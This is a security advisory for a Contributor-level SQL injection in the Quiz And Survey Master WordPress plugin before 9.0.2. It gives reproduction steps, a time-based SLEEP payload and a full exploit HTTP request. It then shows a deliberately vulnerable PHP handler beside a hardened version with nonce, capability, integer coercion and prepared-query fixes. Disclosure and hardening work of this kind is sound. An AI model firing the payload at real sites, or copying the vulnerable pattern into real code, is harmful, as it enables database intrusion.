wpexploit | Project Black | WPEX-ID:E3EEE6BC-1F69-4BE1-B323-0C9B5FE7535E
History: Jun 10, 2024 - 12:00 a.m.

Quiz And Survey Master < 9.0.2 - Contributor+ SQLi

2024-06-10 00:00:00
Project Black
nonce validation
contributor role
quiz deletion
sql injection
security exploit

AI Score: 8.1 High (Confidence: Low)

EPSS: 0 Low (Percentile: 0.0%)

Description: The plugin does not validate or escape the question_id parameter in the qsm_bulk_delete_question_from_database AJAX action, leading to a SQL injection exploitable by users with the Contributor role and above.

1) You will need a valid nonce for deletion of quiz questions.
2) Sign in as a Contributor, create a quiz with at least one question.
3) Edit the quiz and click the "Delete All" button to fire off the right request with a valid nonce.
4) Replace the question ID with the payload below to sleep for 5 seconds:

(SELECT%20%2a%20FROM%20(SELECT(SLEEP(5)))a)

Request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: test.site
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://test.site/wp-admin/admin.php?page=mlw_quiz_options&quiz_id=1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 118
Origin: http://test.site
Connection: keep-alive
Cookie: Contributor_Cookie

action=qsm_bulk_delete_question_from_database&question_id=(SELECT%20%2a%20FROM%20(SELECT(SLEEP(5)))a)&nonce=577a29f6f1
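The root cause in the description is a request parameter reaching SQL without type enforcement or parameter binding. The following is an added illustration, not code from the Quiz And Survey Master plugin or from Project Black: a hypothetical WordPress admin-ajax handler that deletes questions by id, shown first in the vulnerable shape and then hardened. The function names, the nonce action string, the capability and the table name are assumptions chosen for the example.

```php
<?php
// Added illustration (not the plugin's code). Names prefixed my_qsm_, the
// nonce action 'my_qsm_delete_question_nonce', the capability and the table
// name {$wpdb->prefix}my_quiz_questions are assumptions for this example.

// Vulnerable pattern: the raw request value is interpolated into SQL, so a
// value such as the time-based payload above is parsed and executed by MySQL
// instead of being treated as an integer id.
function my_qsm_delete_questions_vulnerable() {
    global $wpdb;
    $question_id = $_POST['question_id'];
    $wpdb->query( "DELETE FROM {$wpdb->prefix}my_quiz_questions WHERE question_id IN ({$question_id})" );
    wp_send_json_success();
}

// Hardened pattern: nonce, capability, integer coercion and a prepared query.
function my_qsm_delete_questions_hardened() {
    global $wpdb;

    // 1. Nonce check. The affected flow already requires a nonce (step 1 of
    //    the PoC), which limits CSRF but does nothing against a logged-in
    //    low-privilege user who holds a valid one.
    check_ajax_referer( 'my_qsm_delete_question_nonce', 'nonce' );

    // 2. Capability check. Bind the action to a capability that Contributors
    //    lack (assumed here: 'edit_others_posts') instead of trusting any
    //    authenticated user.
    if ( ! current_user_can( 'edit_others_posts' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 3. Type enforcement. Accept a comma-separated list of ids, coerce each
    //    element with absint() and drop zeros. A SQL fragment such as
    //    "(SELECT * FROM (SELECT(SLEEP(5)))a)" coerces to 0 and is discarded,
    //    so the request is rejected before any query is built.
    $raw = isset( $_POST['question_id'] ) ? wp_unslash( $_POST['question_id'] ) : '';
    $ids = array_values( array_filter( array_map( 'absint', explode( ',', (string) $raw ) ) ) );
    if ( empty( $ids ) ) {
        wp_send_json_error( 'no valid question ids', 400 );
    }

    // 4. Parameter binding. One %d placeholder per id; $wpdb->prepare() binds
    //    the values so they can never be parsed as SQL syntax.
    $placeholders = implode( ',', array_fill( 0, count( $ids ), '%d' ) );
    $sql = $wpdb->prepare(
        "DELETE FROM {$wpdb->prefix}my_quiz_questions WHERE question_id IN ({$placeholders})",
        $ids
    );
    $wpdb->query( $sql );

    wp_send_json_success( array( 'deleted' => count( $ids ) ) );
}

// Register the hardened handler for logged-in AJAX requests
// (action=my_qsm_delete_questions in the POST body).
add_action( 'wp_ajax_my_qsm_delete_questions', 'my_qsm_delete_questions_hardened' );
```

Each of the four layers closes a different door: the nonce stops cross-site forgery, the capability check removes Contributor-level access to the action entirely, absint() turns the injected SELECT into a rejected zero, and the prepared statement makes the remaining ids inert even if validation were bypassed. A useful regression check for plugin authors is to send the page's SLEEP payload against the hardened handler and confirm the response returns immediately with a 400 rather than after a five-second delay.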
